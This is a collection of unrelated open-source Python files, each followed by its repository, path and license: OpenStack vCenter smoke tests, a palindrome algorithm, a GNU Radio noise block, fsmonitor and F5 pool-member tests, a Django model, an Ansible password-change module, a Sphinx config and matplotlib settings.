client = self.compute_client
LOG.debug("name:%s, image:%s" % (name, image_id))
if 'neutron' in self.config.network.network_provider:
network = [net.id for net in
self.compute_client.networks.list()
if net.label == self.private_net]
if network:
create_kwargs = {
'nics': [
{'net-id': network[0]},
],
}
else:
self.fail("Default private network '{0}' isn't present. "
"Please verify it is properly created.".
format(self.private_net))
server = client.servers.create(name=name,
image=image_id,
flavor=self.micro_flavors[0],
**create_kwargs)
else:
server = client.servers.create(name=name,
image=image_id,
flavor=self.micro_flavors[0])
self.set_resource(name, server)
# self.addCleanup(self.compute_client.servers.delete, server)
self.verify_response_body_content(
name, server.name,
msg="Please refer to OpenStack logs for more details.")
self._wait_for_server_status(server, 'ACTIVE')
server = client.servers.get(server) # getting network information
LOG.debug("server:%s" % server)
return server
def _create_image(self, server):
snapshot_name = rand_name('ost1_test-snapshot-')
create_image_client = self.compute_client.servers.create_image
image_id = create_image_client(server, snapshot_name)
self.addCleanup(self.compute_client.images.delete, image_id)
self._wait_for_server_status(server, 'ACTIVE')
self._wait_for_image_status(image_id, 'ACTIVE')
snapshot_image = self.compute_client.images.get(image_id)
self.verify_response_body_content(
snapshot_name, snapshot_image.name,
msg="Please refer to OpenStack logs for more details.")
return image_id
def test_4_snapshot(self):
"""vCenter: Launch instance, create snapshot, launch instance from \
snapshot
Target component: Glance
Scenario:
1. Get existing image by name.
2. Launch an instance using the default image.
3. Make snapshot of the created instance.
4. Delete the instance created in step 1.
5. Wait while instance deleted
6. Launch another instance from the snapshot created in step 2.
7. Delete server.
Duration: 300 s.
Available since release: 2014.2-6.1
Deployment tags: nova_network, use_vcenter
"""
img_name = 'TestVM-VMDK'
image = self.verify(30, self.get_image_from_name, 1,
"Image can not be retrieved.",
"getting image by name",
img_name)
server = self.verify(180, self._boot_image, 2,
"Image can not be booted.",
"image booting",
image)
# snapshot the instance
snapshot_image_id = self.verify(700, self._create_image, 3,
"Snapshot of an"
" instance can not be created.",
'snapshotting an instance',
server)
self.verify(180, self.compute_client.servers.delete, 4,
"Instance can not be deleted.",
'Instance deletion',
server)
self.verify(180, self._wait_for_server_deletion, 5,
"Instance can not be deleted.",
'Wait for instance deletion complete',
server)
server = self.verify(700, self._boot_image, 6,
"Instance can not be launched from snapshot.",
'booting instance from snapshot',
snapshot_image_id)
self.verify(30, self._delete_server, 7,
"Server can not be deleted.",
"server deletion", server)
class VcenterVolumesTest(nmanager.SmokeChecksTest):
@classmethod
def setUpClass(cls):
super(VcenterVolumesTest, cls).setUpClass()
if cls.manager.clients_initialized:
cls.micro_flavors = cls.find_micro_flavor()
def setUp(self):
super(VcenterVolumesTest, self).setUp()
self.check_clients_state()
if (not self.config.volume.cinder_vmware_node_exist):
self.skipTest('There are no cinder-vmware nodes')
self.check_image_exists()
@classmethod
def tearDownClass(cls):
super(VcenterVolumesTest, cls).tearDownClass()
def _wait_for_volume_status(self, volume, status):
self.status_timeout(self.volume_client.volumes, volume.id, status)
def _wait_for_instance_status(self, server, status):
self.status_timeout(self.compute_client.servers, server.id, status)
def test_5_vcenter_volume_create(self):
"""vCenter: Create volume and attach it to instance
Target component: Compute
Scenario:
1. Create a new small-size volume.
2. Wait for volume status to become "available".
3. Check volume has correct name.
4. Create new instance.
5. Wait for "Active" status
6. Attach volume to an instance.
7. Check volume status is "in use".
8. Get information on the created volume by its id.
9. Detach volume from the instance.
10. Check volume has "available" status.
11. Delete volume.
12. Verify that volume deleted
13. Delete server.
Duration: 350 s.
Available since release: 2014.2-6.1
Deployment tags: nova_network, use_vcenter
"""
msg_s1 = 'Volume was not created.'
img_name = 'TestVM-VMDK'
az = self.config.volume.cinder_vmware_storage_az
# Create volume
volume = self.verify(120, self._create_volume, 1,
msg_s1,
"volume creation",
self.volume_client, None, availability_zone=az)
self.verify(200, self._wait_for_volume_status, 2,
msg_s1,
"volume becoming 'available'",
volume, 'available')
self.verify_response_true(
volume.display_name.startswith('ostf-test-volume'),
'Step 3 failed: {msg}'.format(msg=msg_s1))
# create instance
instance = self.verify(200, self._create_server, 4,
"Instance creation failed. ",
"server creation",
self.compute_client, img_name)
self.verify(200, self._wait_for_instance_status, 5,
'Instance status did not become "available".',
"instance becoming 'available'",
instance, 'ACTIVE')
# Attach volume
self.verify(120, self._attach_volume_to_instance, 6,
'Volume couldn`t be attached.',
'volume attachment',
volume, instance.id)
self.verify(180, self._wait_for_volume_status, 7,
'Attached volume status did not become "in-use".',
"volume becoming 'in-use'",
volume, 'in-use')
# get volume details
self.verify(20, self.volume_client.volumes.get, 8,
"Can not retrieve volume details. ",
"retrieving volume details", volume.id)
# detach volume
self.verify(50, self._detach_volume, 9,
'Can not detach volume. ',
"volume detachment",
instance.id, volume.id)
self.verify(120, self._wait_for_volume_status, 10,
'Volume status did not become "available".',
"volume becoming 'available'",
volume, 'available')
self.verify(50, self.volume_client.volumes.delete, 11,
'Can not delete volume. ',
"volume deletion",
volume)
self.verify(50, self.verify_volume_deletion, 12,
'Can not delete volume. ',
"volume deletion",
volume)
self.verify(30, self._delete_server, 13,
"Can not delete server. ",
"server deletion",
instance)
| eayunstack/fuel-ostf | fuel_health/tests/smoke/test_vcenter.py | Python | apache-2.0 | 20,161 |
"""
问题描述:给定一个字符串str1,只能往str1的后面添加字符变成str2,要求str2
整体都是回文串且最短。
举例:
str1 = ABC12321,则返回ABC12321CBA
"""
import sys
class ShortestEnd:
@classmethod
def get_shortest_end_by_manacher(cls, str1):
if not str1:
return ''
my_str = cls.get_manacher_str(str1)
center = -1
right = -1
parr = [0 for _ in range(len(my_str))]
max_value = -sys.maxsize
for i in range(len(my_str)):
if i > right:
parr[i] = 1
else:
parr[i] = min([parr[2*center-i], right-i])
while i - parr[i] > -1 and i + parr[i] < len(my_str):
if my_str[parr[i]+i] == my_str[i-parr[i]]:
parr[i] += 1
else:
break
if i + parr[i] > right:
right = i + parr[i]
center = i
if right == len(my_str):
max_value = parr[i]
break
return str1 + str1[:len(str1)+1-max_value][::-1]
@classmethod
def get_manacher_str(cls, str1):
new_str = '#'
for s in str1:
new_str += '{}#'.format(s)
return new_str
if __name__ == '__main__':
my_str = 'abcd12321'
print(ShortestEnd.get_shortest_end_by_manacher(my_str)) | ResolveWang/algrithm_qa | other/manacher_shortest.py | Python | mit | 1,402 |
#!/usr/bin/env python
##################################################
# Gnuradio Python Flow Graph
# Title: Phase Noise Generator
# Author: mettus
# Generated: Thu Aug 1 11:59:39 2013
##################################################
from gnuradio import analog
from gnuradio import blocks
from gnuradio import filter
from gnuradio import gr
from gnuradio.filter import firdes
class phase_noise_gen(gr.hier_block2):
def __init__(self, noise_mag=0, alpha=0.1):
gr.hier_block2.__init__(
self, "Phase Noise Generator",
gr.io_signature(1, 1, gr.sizeof_gr_complex * 1),
gr.io_signature(1, 1, gr.sizeof_gr_complex * 1),
)
##################################################
# Parameters
##################################################
self.noise_mag = noise_mag
self.alpha = alpha
##################################################
# Blocks
##################################################
self.filter_single_pole_iir_filter_xx_0 = filter.single_pole_iir_filter_ff(
alpha, 1)
self.blocks_transcendental_0_0 = blocks.transcendental("sin", "float")
self.blocks_transcendental_0 = blocks.transcendental("cos", "float")
self.blocks_multiply_xx_0 = blocks.multiply_vcc(1)
self.blocks_float_to_complex_0 = blocks.float_to_complex(1)
self.analog_noise_source_x_0 = analog.noise_source_f(
analog.GR_GAUSSIAN, noise_mag, 42)
##################################################
# Connections
##################################################
self.connect((self.blocks_float_to_complex_0, 0),
(self.blocks_multiply_xx_0, 1))
self.connect((self.analog_noise_source_x_0, 0),
(self.filter_single_pole_iir_filter_xx_0, 0))
self.connect((self.blocks_multiply_xx_0, 0), (self, 0))
self.connect((self, 0), (self.blocks_multiply_xx_0, 0))
self.connect((self.filter_single_pole_iir_filter_xx_0, 0),
(self.blocks_transcendental_0, 0))
self.connect((self.filter_single_pole_iir_filter_xx_0, 0),
(self.blocks_transcendental_0_0, 0))
self.connect((self.blocks_transcendental_0, 0),
(self.blocks_float_to_complex_0, 0))
self.connect((self.blocks_transcendental_0_0, 0),
(self.blocks_float_to_complex_0, 1))
def get_noise_mag(self):
return self.noise_mag
def set_noise_mag(self, noise_mag):
self.noise_mag = noise_mag
self.analog_noise_source_x_0.set_amplitude(self.noise_mag)
def get_alpha(self):
return self.alpha
def set_alpha(self, alpha):
self.alpha = alpha
self.filter_single_pole_iir_filter_xx_0.set_taps(self.alpha)
| dl1ksv/gnuradio | gr-channels/python/channels/phase_noise_gen.py | Python | gpl-3.0 | 2,882 |
#-*-coding:utf-8-*-
"""
@package fsmonitor.tests.test_base
@brief tests for dropbox.base
@author Sebastian Thiel
@copyright [GNU Lesser General Public License](https://www.gnu.org/licenses/lgpl.html)
"""
__all__ = []
import os
from time import time
from fsmonitor.base import *
from fsmonitor.tree import *
from fsmonitor.finder import *
from . import DropboxTestCase
from bkvstore import KeyValueStoreModifier
class TestPackageDiffer(PackageDiffer):
__slots__ = ('added_seen', 'removed_seen', 'changed_seen', 'unchanged_seen')
def __init__(self):
self.added_seen = self.removed_seen = self.changed_seen = self.unchanged_seen = 0
def _handle_added_package(self, rhs_package):
self.added_seen += 1
def _handle_removed_package(self, lhs_package):
self.removed_seen += 1
def _handle_possibly_changed_package(self, lhs_package, rhs_package, modified):
super(TestPackageDiffer, self)._handle_possibly_changed_package(lhs_package, rhs_package, modified)
self.changed_seen += modified == True
self.unchanged_seen += modified == False
# end class TestPackageDiffer
class BaseDropboxTestCase(DropboxTestCase):
__slots__ = ()
tree_a = 'tree/a'
tree_b = 'tree/b'
def test_finder(self):
"""Test for the dropbox finder implementation"""
df = DropboxFinder(paths=[self.fixture_path('')], config_file_glob='dropbox.yaml')
assert len(df.dropboxes) == 0
assert len(list(df.iter_dropboxes())) == 0
assert len(df.update(known_only=True).dropboxes) == 0, "there is nothing to update yet"
assert len(df.update(known_only=False).dropboxes) == 0, "now it should have found nothing, search depth not high enough"
df.max_depth = 2
assert len(df.update().dropboxes) == 1, "search depth should now be sufficient"
# Just update again to trigger some code - for now we trust it's capability to detect changes
# and obey it's arguments
for known in range(2):
assert len(df.update(known_only=known).dropboxes) == 1
# end for each known item
assert len(list(df.iter_dropboxes())) == 1, "should be same result"
db = df.iter_dropboxes().next()
for pkg in db.iter_packages():
assert df.dropbox_by_contained_path(pkg.root()) is db
# end for each package
def test_dropbox(self):
"""Test basic dropbox type"""
config = KeyValueStoreModifier(dict(package=dict(search_paths=[str(self.fixture_path(self.tree_a)),
str(self.fixture_path(self.tree_b))])))
db = Dropbox(config)
assert len(db.trees()) == 2
# can't clear cache without config path
self.failUnlessRaises(AssertionError, db.clear_configuration_cache)
assert db.clear_configuration_cache(configuration=config) is db
# test package diff - there may be no change
tpd = TestPackageDiffer()
assert len(db.diff_tree_sample_packages(tpd)) == 9
assert tpd.added_seen == tpd.removed_seen == tpd.changed_seen == 0
assert tpd.unchanged_seen == 9
dp = Dropbox(self.fixture_path('tree/dropbox.yaml'))
assert len(dp.trees()) == 2, "initialized from a file, the result should be the same"
def test_tree(self):
"""Test the tree type's basic functionality"""
tree = TreeRoot(self.fixture_path(self.tree_a))
assert tree.root_path() is not None
assert tree.sample_time() is not None
assert len(tree) == 4
assert not isinstance(tree['file.ext'], dict), "should obtain file"
assert isinstance(tree['dir_full'], dict), "should have gotten dict"
assert not isinstance(tree['dir_full/file.ext'], dict), "should have gotten file"
assert not isinstance(tree['first_level_empty/subdir/package_dir/empty.file'], dict), 'should have gotten file'
packs = sorted(tree.iter_packages())
assert len(packs) == 5, "Should have exactly 4 packages"
rela_packs = ['7.3.\xc2\xa0package-cleanup.html', 'dir_full', 'file.ext', 'first_level_empty/package_dir', 'first_level_empty/subdir/package_dir']
assert [p.root_relative() for p in packs] == rela_packs, "didn't get expected packages"
# Test testing for changes and affected packages
tree2 = TreeRoot(self.fixture_path('tree/a'))
assert tree2 == tree, "tree comparison should work"
packs2 = sorted(tree2.iter_packages())
pid = 2
assert packs2[pid].set_stable_since(time()) is packs2[pid]
assert packs2[pid] == packs[pid], "Package comparison should work"
# change contents of file, and comparison should change
assert packs2[pid].root().isfile()
tree2[packs2[pid].root_relative()] = os.stat('.')
assert packs2[pid] != packs[pid]
assert packs[1].root().isdir() and packs[0] != packs[pid], "Should be able to compare file and directory packages"
assert len(packs[1].entries())
assert packs[pid].set_tree(tree2) is packs[pid], "tree can be changed to anything compatible"
# set it back ... for diffing later
assert packs[pid].set_tree(tree) is packs[pid], "tree can be changed to anything compatible"
# prepare tree for diff
#######################
# Add fake package
packs2.append(Package(tree2, 'first_level_empty'))
# remove package
del packs2[0]
tpd = TestPackageDiffer()
rhspacks = tpd.diff(packs, packs2)
assert tpd.added_seen == tpd.removed_seen == tpd.changed_seen == 1
assert tpd.unchanged_seen == 3
assert len(packs) == 5
tpd = TestPackageDiffer()
assert tpd.diff(list(), packs)
assert tpd.added_seen == 5
# Entries
c = 0
for name in tree:
c += 1
assert len(tree.entries(name))
# end for each name
assert c
| Byron/bit | src/python/fsmonitor/tests/test_base.py | Python | lgpl-3.0 | 6,032 |
from django.db import models
from cinemania.utils import slugify
__all__ = ['BaseModel']
class BaseModel(models.Model):
"""Base model"""
# Title field
title = models.CharField(unique=True, max_length=64)
# Slug field
slug = models.SlugField(primary_key=True, max_length=64)
class Meta:
app_label = 'cinemania'
abstract = True
def __cmp__(self, other):
return cmp(self.slug, other.slug)
def __unicode__(self):
return self.title
def save(self, force_update=False, force_insert=False):
# Create slug from title field
self.slug = slugify(self.title, instance=self)
super(BaseModel, self).save(force_update=force_update, force_insert=force_insert)
| bashu/cinemania | cinemania/models/base.py | Python | gpl-3.0 | 744 |
#!/usr/bin/python
'''
See DOCUMENTATION constant.
'''
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
module: tendrl_user
short_description: Changes 'usm_username' user password to _password_from_module_argument_
via Tendrl API.
description:
- Module reads from confile(module argument 'conf_path') 'usm_username',
'usm_password' and 'usm_api_url'.
- There must be installed tendrl-api on the machine where this is ran.
version_added: "1.0"
author:
- "fbalak@redhat.com"
- "mkudlej@redhat.com"
'''
EXAMPLES = '''
ansible -i _inventory_ -m tendrl_user -a "conf_path='_usm.yaml.path_'" localhost
'''
import json
import yaml
import requests
from ansible.module_utils.basic import AnsibleModule
MODULE = AnsibleModule(
argument_spec=dict(
conf_path=dict(required=True, type='str'),
new_password=dict(required=True, type='str')
)
)
def login(api_url, username, password):
"""Login to tendrl server."""
post_data = {"username": username, "password": password}
request = requests.post(
"{}login".format(api_url),
data=json.dumps(post_data))
if request.status_code == requests.codes["ok"]:
return request.json()
else:
response = {"url": request.url, "data": post_data}
MODULE.fail_json(
msg="Could not login with these credentials.",
meta=response)
def change_password(api_url, username, password, token):
"""Change password of user and set it's email to username@hostname"""
post_data = {
"username": username,
"password": password,
"password_confirmation": password,
"email": "{}@{}".format(username, 'localhost.localdomain')}
request = requests.put(
"{}users/{}".format(api_url, username),
data=json.dumps(post_data),
headers={"Authorization": "Bearer {}".format(token)})
if request.status_code == requests.codes["ok"]:
return request.json()
else:
response = {"url": request.url, "data": post_data, "token": token, "text": request.text}
MODULE.fail_json(msg="Request to server failed.", meta=response)
def main():
"""Main function"""
conf_paths = MODULE.params['conf_path']
new_password = MODULE.params['new_password']
conf_paths = conf_paths.split(' ')
for c in conf_paths:
with open(c, "r") as stream:
try:
conf = yaml.load(stream)
except yaml.YAMLError as exc:
print(exc)
try:
username = conf['usmqe']['username']
except:
pass
try:
password = conf['usmqe']['password']
pass_conf = c
data = yaml.load(stream)
except:
pass
try:
api_url = conf['usmqe']['api_url']
except:
pass
assert username is not None
assert password is not None
assert api_url is not None
token = login(api_url, username, password)["access_token"]
if password == new_password:
MODULE.exit_json(changed=False)
result = change_password(api_url, username, new_password, token)
response = {"result": result}
data["usmqe"]["password"] = new_password
with open(pass_conf, "w") as f:
yaml.dump(data, f)
MODULE.exit_json(changed=True, meta=response)
if __name__ == '__main__':
main()
| usmqe/usmqe-setup | library/tendrl_user.py | Python | apache-2.0 | 3,557 |
#!/usr/bin/env python
# Copyright (c) 2017-2021 F5 Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
from f5_cccl.resource.ltm.pool_member import ApiPoolMember
from f5_cccl.resource.ltm.pool_member import PoolMember
from mock import MagicMock
# import pdb
import pytest
@pytest.fixture
def members():
members = {
'member_min_config': {
'address': "172.16.200.100",
'port': 80
},
'member_w_route_domain': {
'address': "172.16.200.101%0",
'port': 80,
},
'member_no_port': {
'address': "172.16.200.102",
},
'member_no_address': {
'port': 80,
},
'member_w_nonzero_route_domain': {
'address': "172.16.200.103%2",
'port': 80,
},
'member_min_ipv6_config': {
'address': "2001:0db8:3c4d:0015:0000:0000:abcd:ef12",
'port': 80
},
'member_min_ipv6_rd_config': {
'address': "2001:0db8:3c4d:0015:0000:0000:abcd:ef12%2",
'port': 80,
}
}
return members
@pytest.fixture
def bigip():
"""Fixture that returns BIG-IP."""
bigip = MagicMock()
return bigip
@pytest.fixture
def pool():
"""Fixture that returns a Pool object."""
return MagicMock()
POOL_PROPERTIES = PoolMember.properties
def test_create_cccl_member_min_config(pool, members):
"""Test creation of ApiPoolMember from bare config."""
cfg_name = "member_min_config"
partition = "Common"
# pdb.set_trace()
member = ApiPoolMember(
partition=partition,
default_route_domain=0,
pool=pool,
**members[cfg_name]
)
assert member
# Test data
assert member.data
pool_data = copy.copy(member.data)
for k, _ in list(POOL_PROPERTIES.items()):
if k == 'name':
assert pool_data['name'] == "172.16.200.100%0:80"
elif k == 'partition':
assert pool_data['partition'] == "Common"
elif k == 'ratio':
assert pool_data['ratio'] == 1
elif k == 'connectionLimit':
assert pool_data['connectionLimit'] == 0
elif k == 'priorityGroup':
assert pool_data['priorityGroup'] == 0
elif k == 'session':
assert pool_data['session'] == "user-enabled"
elif k == 'description':
assert not pool_data['description']
pool_data.pop(k)
assert not pool_data, "unexpected keys found in data"
def test_create_cccl_member_w_route_domain(pool, members):
"""Test creation of ApiPoolMember from bare config w route domain."""
cfg_name = "member_w_route_domain"
partition = "Common"
member = ApiPoolMember(
partition=partition,
default_route_domain=0,
pool=pool,
**members[cfg_name]
)
assert member
# Test data
assert member.data
pool_data = copy.copy(member.data)
for k, _ in list(POOL_PROPERTIES.items()):
if k == 'name':
assert pool_data['name'] == "172.16.200.101%0:80"
elif k == 'partition':
assert pool_data['partition'] == "Common"
elif k == 'ratio':
assert pool_data['ratio'] == 1
elif k == 'connectionLimit':
assert pool_data['connectionLimit'] == 0
elif k == 'priorityGroup':
assert pool_data['priorityGroup'] == 0
elif k == 'session':
assert pool_data['session'] == "user-enabled"
elif k == 'description':
assert not pool_data['description']
pool_data.pop(k)
assert not pool_data, "unexpected keys found in data"
def test_create_cccl_member_no_port(pool, members):
"""Test of ApiPoolMember create without name or port."""
cfg_name = "member_no_port"
partition = "Common"
with pytest.raises(TypeError):
member = ApiPoolMember(
partition=partition,
default_route_domain=0,
pool=pool,
**members[cfg_name]
)
assert not member
def test_create_cccl_member_no_address(pool, members):
"""Test of ApiPoolMember create without name or address."""
cfg_name = "member_no_address"
partition = "Common"
with pytest.raises(TypeError):
member = ApiPoolMember(
partition=partition,
default_route_domain=0,
pool=pool,
**members[cfg_name]
)
assert not member
def test_create_cccl_member_w_nonzero_route_domain(pool, members):
"""Test of ApiPoolMember create with non-zero route-domain."""
cfg_name = "member_w_nonzero_route_domain"
partition = "Common"
member = ApiPoolMember(
partition=partition,
default_route_domain=0,
pool=pool,
**members[cfg_name]
)
assert member
# Test data
assert member.data
pool_data = copy.copy(member.data)
for k, _ in list(POOL_PROPERTIES.items()):
if k == 'name':
assert pool_data['name'] == "172.16.200.103%2:80"
elif k == 'partition':
assert pool_data['partition'] == "Common"
elif k == 'ratio':
assert pool_data['ratio'] == 1
elif k == 'connectionLimit':
assert pool_data['connectionLimit'] == 0
elif k == 'priorityGroup':
assert pool_data['priorityGroup'] == 0
elif k == 'session':
assert pool_data['session'] == "user-enabled"
elif k == 'description':
assert not pool_data['description']
pool_data.pop(k)
assert not pool_data, "unexpected keys found in data"
def test_create_cccl_member_min_ipv6_config(pool, members):
"""Test of ApiPoolMember create with IPv6 address."""
cfg_name = "member_min_ipv6_config"
partition = "Common"
# pdb.set_trace()
member = ApiPoolMember(
partition=partition,
default_route_domain=0,
pool=pool,
**members[cfg_name]
)
assert member
# Test data
assert member.data
pool_data = copy.copy(member.data)
for k, _ in list(POOL_PROPERTIES.items()):
if k == 'name':
assert (pool_data['name'] ==
"2001:0db8:3c4d:0015:0000:0000:abcd:ef12%0.80")
elif k == 'partition':
assert pool_data['partition'] == "Common"
elif k == 'ratio':
assert pool_data['ratio'] == 1
elif k == 'connectionLimit':
assert pool_data['connectionLimit'] == 0
elif k == 'priorityGroup':
assert pool_data['priorityGroup'] == 0
elif k == 'session':
assert pool_data['session'] == "user-enabled"
elif k == 'description':
assert not pool_data['description']
pool_data.pop(k)
assert not pool_data, "unexpected keys found in data"
def test_create_cccl_member_min_ipv6_rd_config(pool, members):
"""Test of ApiPoolMember create with IPv6 address and route domain."""
cfg_name = "member_min_ipv6_rd_config"
partition = "Common"
# pdb.set_trace()
member = ApiPoolMember(
partition=partition,
default_route_domain=0,
pool=pool,
**members[cfg_name]
)
assert member
# Test data
assert member.data
pool_data = copy.copy(member.data)
for k, _ in list(POOL_PROPERTIES.items()):
if k == 'name':
assert (pool_data['name'] ==
"2001:0db8:3c4d:0015:0000:0000:abcd:ef12%2.80")
elif k == 'partition':
assert pool_data['partition'] == "Common"
elif k == 'ratio':
assert pool_data['ratio'] == 1
elif k == 'connectionLimit':
assert pool_data['connectionLimit'] == 0
elif k == 'priorityGroup':
assert pool_data['priorityGroup'] == 0
elif k == 'session':
assert pool_data['session'] == "user-enabled"
elif k == 'description':
assert not pool_data['description']
pool_data.pop(k)
assert not pool_data, "unexpected keys found in data"
| f5devcentral/f5-cccl | f5_cccl/resource/ltm/test/test_api_pool_member.py | Python | apache-2.0 | 8,616 |
# -*- coding: utf-8 -*-
#
# dh-virtualenv documentation build configuration file, created by
# sphinx-quickstart on Wed Feb 20 17:29:43 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import re
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath(".."))
from setup import project as meta
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if not on_rtd:
import sphinx_rtd_theme
# https://docs.readthedocs.io/en/latest/guides/adding-custom-css.html
def setup(app):
app.add_css_file('css/custom.css')
#app.add_javascript('js/custom.js')
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.autodoc', 'sphinx.ext.doctest', 'sphinx.ext.coverage',
'sphinx.ext.ifconfig', 'sphinx.ext.viewcode', 'sphinx.ext.napoleon',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = meta["name"]
copyright = u'2013-2018 Spotify AB and contributors'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
# The full version, including alpha/beta/rc tags.
release = meta["version"]
# The short X.Y version.
version = '.'.join(re.split("[^\d]+", release)[:2])
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
today_fmt = '%Y-%m-%d'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = [
'*~',
'_build',
'LICENSE.rst',
'README.rst',
'modules.rst',
'dh_virtualenv.1.rst',
'api/modules.rst',
]
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# Napoleon settings
napoleon_numpy_docstring = False
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
if not on_rtd:
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
##html_logo = '_static/img/logo-180px.png'
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%Y-%m-%d'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'dh-virtualenvdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'dh-virtualenv.tex', u'dh-virtualenv Documentation',
u'Spotify AB', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'dh-virtualenv', u'dh-virtualenv Documentation',
[u'Spotify AB'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'dh-virtualenv', u'dh-virtualenv Documentation',
u'Spotify AB', 'dh-virtualenv',
'Debian packaging sequence for Python virtualenvs.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
| spotify/dh-virtualenv | doc/conf.py | Python | gpl-2.0 | 8,829 |
# -*- coding: utf-8 -*-
"""
@author: Ana Andres-Arroyo
Matplotlib settings for Surface Pro 4
"""
import matplotlib
# matplotlib.rcParams.update({'font.size': 30})
matplotlib.rcParams.update({'lines.linewidth': 5})
matplotlib.rcParams.update({'axes.grid': True})
matplotlib.rcParams.update({'axes.linewidth': 2})
matplotlib.rcParams.update({'axes.axisbelow': True})
matplotlib.rcParams.update({'axes.labelpad': 3})
#matplotlib.rcParams.update({'axes.titlepad': 25})
matplotlib.rcParams.update({'xtick.major.size': 15})
matplotlib.rcParams.update({'ytick.major.size': 15})
matplotlib.rcParams.update({'xtick.major.pad': 10})
matplotlib.rcParams.update({'ytick.major.pad': 10})
matplotlib.rcParams.update({'xtick.major.width': 2})
matplotlib.rcParams.update({'ytick.major.width': 2})
matplotlib.rcParams.update({'grid.linewidth': 1.5})
